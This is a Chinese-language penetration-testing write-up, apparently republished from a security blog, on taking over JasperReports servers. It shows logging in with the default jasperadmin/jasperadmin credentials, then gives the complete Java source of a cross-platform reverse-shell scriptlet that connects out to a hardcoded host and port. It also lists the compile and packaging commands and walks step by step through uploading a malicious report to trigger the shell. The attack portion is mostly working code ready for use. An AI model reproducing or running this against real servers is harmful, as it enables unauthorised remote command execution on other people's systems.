Hacking JasperReports:隐藏的SHELL特征

前言

不久前,我的同事跟我在对一个客户端进行渗透测试。我们确实发现的一件事是,他们留下了几个联网JasperReports服务器。寻找默认管理帐户的用户名并没有花费太多的精力。

login

也没有用多久我们就猜解出密码是“jasperadmin”

我从前听过JasperReports但从来没有碰到过要对它进行渗透测试。一个快速的google搜索也没有对前期工作产生多大的作用。尽管这个管理界面很不常见但是它也没有摆脱以某种方式来执行代码,所以顺利成章的我们开始在渗透旅程中把JasperReports渗透测试添加进“容易成功”的列表。

代码和小脚本

JasperReports的目的是提取数据从各种各样的来源,例如:databases, xml, flat files等等,并且基于用户定义的模板用某种方式生成一份漂亮的报告。模板在JasperReports被定义为“JRXML”文件,任何拥有创建编辑报告权限的用户都可以上传它。

JasperReports的设计者允许数据在被包含在报告之前自定义操作。接下来就是利用一些小技巧用Java来编写一段脚本!我想也许你会看到这个。

我们的目标呢,就是创建一个报告模板(JRXML file)当然是依旧定制的恶意脚本,当它运行时,我们可以收到一个shell。这篇文章的其余部分将会详细描述我们是如何将脚本和报告模板联系到一起的。

编辑模板

我们仅仅编辑一个存在的模板而不是创建一个。以下是我们将使用的模板。注意一下,过于复杂以及其中的90%是完全不必要的。下面这个只是一个带有“JasperStudio”的简单样本报告。35–42行是有趣的一个部分,我在这个部分插入了“ShellScriptlet”。

shell.jrxml

Code:https://github.com/re4lity/shell.jrxml

接下来看42行:

<textFieldExpression><![CDATA[$P{ShellScriptlet_SCRIPTLET}.getShell()]]></textFieldExpression>

这里我们调用一个getshell的方法在ShellScriptlet_SCRIPTLET。在35行我们定义了一个ShellScriptlet_SCRIPTLET 来引用“foxglove.shell.ShellScriptlet”中的Java代码。

<scriptlet name=”ShellScriptlet” class=”foxglove.shell.ShellScriptlet”>

<scriptletDescription><![CDATA[]]></scriptletDescription>

</scriptlet>

这很简单,但这在Java代码本身是如何定义的呢?

编写攻击脚本

scriptlet用Java编写,需要去扩展“JRDefaultScriptlet”。我从”here”中借用了一些Java代码来反弹shell并且让这种攻击脚本成为跨平台的。下面就是结果了,要注意“host”和“port”的写法是固定的:

package foxglove.shell;
import java.io.*;
import java.net.*;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.DataInputStream;
import net.sf.jasperreports.engine.JRDefaultScriptlet;
import net.sf.jasperreports.engine.JRScriptletException;
 
public class ShellScriptlet extends JRDefaultScriptlet implements Runnable{
 Socket socket;
 
 PrintWriter socketWrite;
 BufferedReader socketRead;
 
 PrintWriter commandWrite;
 BufferedReader commandRead;
 
 static String ip;
 int port = 8080;
 
 public String getShell(){
 ip = "1.1.1.1";
 ShellScriptlet shell = new ShellScriptlet();
 shell.establishConnection();
 new Thread(shell).start();
 shell.getCommand();
 return "DONE";
 }
 
 public void run(){
 spawnShell();
 }
 
 public void spawnShell(){
 boolean windows = false;
 try{
 if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
 windows = true;
 }
 
 Runtime rt = Runtime.getRuntime();
 Process p;
 if(windows) p = rt.exec("C:\\Windows\\System32\\cmd.exe");
 else p = rt.exec("/bin/sh");
 
 InputStream readme = p.getInputStream();
 OutputStream writeme = p.getOutputStream();
 commandWrite = new PrintWriter(writeme);
 commandRead = new BufferedReader(new InputStreamReader(readme));
 
 if(windows) commandWrite.println("dir");
 else commandWrite.println("ls -al");
 
 commandWrite.flush();
 
 String line;
 while((line = commandRead.readLine()) != null){
 socketWrite.println(line);
 socketWrite.flush();
 }
 
 p.destroy();
 
 }catch(Exception e){}
 
 }
 
 public void establishConnection(){
 try{
 socket = new Socket(ip,port);
 socketWrite = new PrintWriter(socket.getOutputStream(),true);
 socketRead = new BufferedReader(new InputStreamReader(socket.getInputStream()));
 socketWrite.println("---Connection has been established---");
 socketWrite.flush();
 }catch(Exception e){}
 
 }
 
 public void getCommand(){
 String foo;
 
 try{
 while((foo=socketRead.readLine())!= null){
 commandWrite.println(foo);
 commandWrite.flush();
 }
 }catch(Exception e){}
 }
 
 public static void main(String args[]){
 ShellScriptlet r = new ShellScriptlet();
 r.getShell();
 }
}
对于那些不熟悉Java的,你可以用下面的命令编译在相同的目录中
/usr/lib/jvm/java-6-openjdk-amd64/bin/javac -Xlint -cp .:jasperreports-5.0.0.jar *.java -d .

这里指定” javac “的完整路径是有原因的(这是Java 1.6)。如果你运行这个命令对某种系统会出错,你需要考虑理想情况下用相同的环境来编译它,至少不是最新的版本!

接下来我们要做的就是把所有的代码打包趁有个jar文件然后上传到目标站点。你可以使用下面这个代码来完成它:

/usr/lib/jvm/java-6-openjdk-amd64/bin/jar cvf shell.jar foxglove/
如果一切进行的顺利,你就会得到个“shell.jar”文件,接下来就准备上传这个到目标站点吧!

部署这个新的“Report”

每个版本的JasperReports似乎都有些不同,但是他们都有相同的函数和工作流。

首先很明显我们要去验证一下“jasperadmin/jasperadmin”:

authd

在我这个版本中,这就立即显示出了有一堆reports样例的“Repository”(要确保“Type”这一列说的是“Report”)。

接下来,我们只要右击一个report并且点击“Edit”就好。

一开始,就点击 “Controls and Resources” 之后点击“Add Resource”。上传我们之前创建的JAR文件并给这个资源命名为“ShellScriptlet”。结束之后我们应该可以看到下图这样的结果:

resource
点击左侧栏的“Set Up”,单击 “Upload a Local file”把我们之前创建的JRXML文件上传了。你应该可以得到下图所示的结果:
resources2
Jasper 现在让我们去定义一些我们在JRXML文件引用的资源。如果你是一个keener你可能会仅仅把这些资源从JRXML文件中删除。仅仅单击“Add Now”并且上传一些随机的PNG图片文件为你每一个引用资源…当你做完这些应该看起来像下图一样:
resourcesadded
现在你只需要点击“Submit”在这个按钮来创建我们的恶意report就好了。哈哈

Shellz!

先别激动,在你运行这个report之前,你还要开个监听端口去捕捉你的shell!!!

listener

之后单击你创建的report,它将会运行Java代码,如果没有什么问题,你就可以看到反弹的shell了。

shell1

原创文章,作者:Z3r0yu,如若转载,请注明出处:http://www.mottoin.com/article/web/90582.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code